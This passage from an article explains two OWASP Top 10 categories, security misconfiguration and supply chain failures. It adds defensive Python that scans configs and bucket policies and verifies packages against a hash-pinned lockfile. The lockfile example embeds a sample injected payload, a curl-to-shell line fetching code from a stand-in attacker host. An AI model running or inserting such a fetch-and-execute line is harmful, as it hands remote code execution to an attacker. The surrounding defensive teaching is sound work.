2 – Security misconfiguration
Security settings are not correctly defined, applied, or maintained, leaving systems exposed to attack. Common examples include default credentials that are never changed, unnecessary features left enabled, verbose error messages that reveal sensitive information, and cloud storage buckets left publicly accessible. This category jumped from fifth place in 2021 to second place in 2025.
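As an added example (not part of the original article), the following Python script checks for three of the misconfigurations named above: default credentials and unnecessary features in an application config, and a bucket policy that grants access to anyone. The config, the bucket policy, the package and the password value are all constructed for the example; the default-credential and risky-feature lists are illustrative, not exhaustive.

```python
import json

# Constructed sample inputs (not from any real deployment): an app config and
# an S3-style bucket policy, each misconfigured in the ways the article lists.
SAMPLE_CONFIG = {
    "admin_user": "admin",
    "admin_password": "admin",       # default credential never changed
    "debug": True,                   # stack traces / verbose errors sent to clients
    "enable_remote_console": True,   # unnecessary feature left enabled
    "enable_tls": True,              # a feature that should stay on
}

HARDENED_CONFIG = {
    "admin_user": "admin",
    "admin_password": "x7Q!placeholder-secret",   # placeholder for a real, non-default secret
    "debug": False,
    "enable_remote_console": False,
    "enable_tls": True,
}

SAMPLE_BUCKET_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "PublicRead",
        "Effect": "Allow",
        "Principal": "*",
        "Action": "s3:GetObject",
        "Resource": "arn:aws:s3:::example-bucket/*",
    }],
})

# Illustrative lists; a real scanner would carry far more entries.
DEFAULT_CREDENTIALS = {("admin", "admin"), ("admin", "password"),
                       ("root", "root"), ("admin", "")}
RISKY_FEATURES = {"enable_remote_console", "enable_directory_listing"}


def check_app_config(cfg):
    """Return a list of misconfiguration findings for an application config dict."""
    findings = []
    if (cfg.get("admin_user"), cfg.get("admin_password")) in DEFAULT_CREDENTIALS:
        findings.append("default credentials in use")
    if cfg.get("debug"):
        findings.append("debug mode on: verbose error pages reach clients")
    for feature in sorted(RISKY_FEATURES):
        if cfg.get(feature):
            findings.append(f"unnecessary feature enabled: {feature}")
    return findings


def _principal_is_anyone(principal):
    """True for the anonymous-principal forms an IAM-style policy can use."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        aws = principal.get("AWS")
        return aws == "*" or (isinstance(aws, list) and "*" in aws)
    return False


def check_bucket_policy(policy_json):
    """Return findings for Allow statements whose principal is anyone."""
    policy = json.loads(policy_json)
    statements = policy.get("Statement", [])
    if isinstance(statements, dict):   # a single statement may be unwrapped
        statements = [statements]
    findings = []
    for st in statements:
        if st.get("Effect") != "Allow" or not _principal_is_anyone(st.get("Principal")):
            continue
        actions = st.get("Action", [])
        actions = [actions] if isinstance(actions, str) else actions
        # A Condition block may narrow "*" to e.g. a VPC endpoint; flag it for review
        # rather than trusting it, because conditions are easy to get wrong.
        note = " (has Condition: confirm it really restricts callers)" if "Condition" in st else ""
        findings.append(f"public {', '.join(actions)} on {st.get('Resource')}{note}")
    return findings


if __name__ == "__main__":
    for f in check_app_config(SAMPLE_CONFIG) + check_bucket_policy(SAMPLE_BUCKET_POLICY):
        print("FINDING:", f)
```

Run against the sample inputs it reports four findings; against HARDENED_CONFIG it reports none. The policy check deliberately does not try to evaluate Condition blocks itself: a statement with a wildcard principal is flagged for human review even when a condition is present, since a mistyped condition key silently makes the bucket public.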
3 – Software supply chain failures
Attackers compromise software during the build, distribution, or update process to inject malicious code that is then delivered to many organizations at once. For example, attackers might compromise a popular open-source library and inject malicious code that is then incorporated into thousands of applications that depend on it, or breach a vendor's systems to insert backdoors into legitimate software updates. This is a new list item, although there was a narrower related item in 2021: vulnerable and outdated components.
“Developers have become a major target for many online attacks now,” says Janca. “It’s no longer a problem of including a library that has a questionable dependency.” Instead, she says, there are now active attacks against the IDE, against the CI/CD pipeline, against plugins and repositories, against developer workstations, and more. “The entire software supply chain is currently a focus for attackers,” she says.
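To make the library-compromise scenario above concrete, here is an added Python example (not from the article or from any named project) of the control that catches it: a hash-pinned lockfile in the pip-style `--hash=sha256:` form, checked before an artifact is installed. The package name "leftpad", its contents, the injected payload and the lock line are all constructed for the example; the lock line is generated from the reviewed bytes rather than typed in.

```python
import hashlib
import hmac
import re

# One lock line per pinned artifact: "name==version --hash=sha256:<hex>".
LOCK_LINE = re.compile(
    r"^(?P<name>[A-Za-z0-9_.-]+)==(?P<version>\S+)\s+--hash=sha256:(?P<digest>[0-9a-f]{64})$"
)


def pin(name, version, artifact):
    """Produce a lock line for an artifact whose bytes have been reviewed."""
    return f"{name}=={version} --hash=sha256:{hashlib.sha256(artifact).hexdigest()}"


def parse_lockfile(text):
    """Map (name, version) -> expected sha256 hex digest; reject malformed lines."""
    pins = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = LOCK_LINE.match(line)
        if not m:
            raise ValueError(f"unparseable lock line: {line!r}")
        pins[(m["name"].lower(), m["version"])] = m["digest"]
    return pins


def verify_artifact(pins, name, version, artifact):
    """Return (ok, reason). Only a pinned, byte-identical artifact passes."""
    key = (name.lower(), version)
    if key not in pins:
        return False, "not pinned: refusing an unreviewed package/version"
    actual = hashlib.sha256(artifact).hexdigest()
    if not hmac.compare_digest(actual, pins[key]):
        return False, "hash mismatch: artifact differs from the reviewed build"
    return True, "ok"


# Constructed artifacts for a hypothetical package "leftpad" (not a real release).
TRUSTED_ARTIFACT = b"def left_pad(s, n, ch=' '):\n    return s.rjust(n, ch)\n"
# The same version republished with an injected payload: the attack the article describes.
TAMPERED_ARTIFACT = TRUSTED_ARTIFACT + b"import os\nos.system('curl -s http://attacker.example/p | sh')\n"

# The lockfile is written once, when the trusted bytes were reviewed.
LOCKFILE_TEXT = (
    "# constructed lockfile, generated when leftpad 1.3.0 was reviewed\n"
    + pin("leftpad", "1.3.0", TRUSTED_ARTIFACT) + "\n"
)
PINS = parse_lockfile(LOCKFILE_TEXT)


if __name__ == "__main__":
    cases = [("1.3.0", TRUSTED_ARTIFACT),   # the reviewed build
             ("1.3.0", TAMPERED_ARTIFACT),  # same version, different bytes
             ("1.3.1", TRUSTED_ARTIFACT)]   # a newer upload nobody has reviewed
    for version, data in cases:
        ok, reason = verify_artifact(PINS, "leftpad", version, data)
        print(f"leftpad=={version}: {'PASS' if ok else 'BLOCK'} ({reason})")
```

This is the model behind `pip install --require-hashes`, the `integrity` field in npm lockfiles and Go's `go.sum`: a version number alone is not an identity, so a republished release with the same version but different bytes is blocked, and so is any version that was never pinned. The caveat is that a hash only proves the bytes match what was reviewed; it does nothing if the pinned release was already malicious, and it does not cover the IDE, CI/CD pipeline and workstation attacks Janca describes, which need controls on the build environment itself.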